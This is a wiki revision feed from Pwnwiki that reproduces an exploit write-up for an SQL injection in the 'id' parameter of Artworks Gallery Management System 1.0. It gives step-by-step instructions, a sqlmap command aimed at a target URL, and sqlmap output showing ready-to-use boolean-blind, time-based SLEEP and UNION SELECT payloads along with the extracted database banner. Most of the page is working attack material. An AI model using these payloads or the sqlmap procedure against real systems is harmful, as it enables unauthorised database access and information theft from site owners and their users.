https://pwnwiki.com/index.php?action=history&feed=atom&title=Artworks_Gallery_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
Artworks Gallery Management System 1.0 SQL注入漏洞 - Revision history
2026-04-13T09:00:03Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Artworks_Gallery_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=3295&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection # Exploit Author: Vijay Sachdeva # Date: 2020-12-22 # Vendor Homepage: https://www.s..."
2021-05-26T13:10:26Z
<p>Created page with "==EXP== <pre> # Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection # Exploit Author: Vijay Sachdeva # Date: 2020-12-22 # Vendor Homepage: https://www.s..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection<br />
# Exploit Author: Vijay Sachdeva<br />
# Date: 2020-12-22<br />
# Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html<br />
# Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code<br />
# Affected Version: Version 1<br />
# Tested on Kali Linux<br />
<br />
Step 1. Log in to the application with admin credentials.<br />
<br />
Step 2. Click on "Explore" and then select "Artworks".<br />
<br />
Step 3. Choose any item, the URL should be "<br />
<br />
http://localhost/art-bay/info_art.php?id=6<br />
<br />
Step 4. Run sqlmap on the URL where the "id" parameter is given<br />
<br />
<br />
sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner<br />
<br />
---<br />
<br />
<br />
Parameter: id (GET)<br />
<br />
Type: boolean-based blind<br />
<br />
Title: AND boolean-based blind - WHERE or HAVING clause<br />
<br />
Payload: id=8 AND 4531=4531<br />
<br />
<br />
Type: time-based blind<br />
<br />
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />
<br />
Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG)<br />
<br />
<br />
Type: UNION query<br />
<br />
Title: Generic UNION query (NULL) - 9 columns<br />
<br />
Payload: id=8 UNION ALL SELECT<br />
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)--<br />
-<br />
<br />
---<br />
<br />
[08:18:34] [INFO] the back-end DBMS is MySQL<br />
<br />
[08:18:34] [INFO] fetching banner<br />
<br />
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br />
<br />
banner: '10.3.24-MariaDB-2'<br />
<br />
<br />
---<br />
<br />
<br />
Step 5. Sqlmap should inject the web-app successfully which leads to<br />
information disclosure.<br />
</pre></div>
Pwnwiki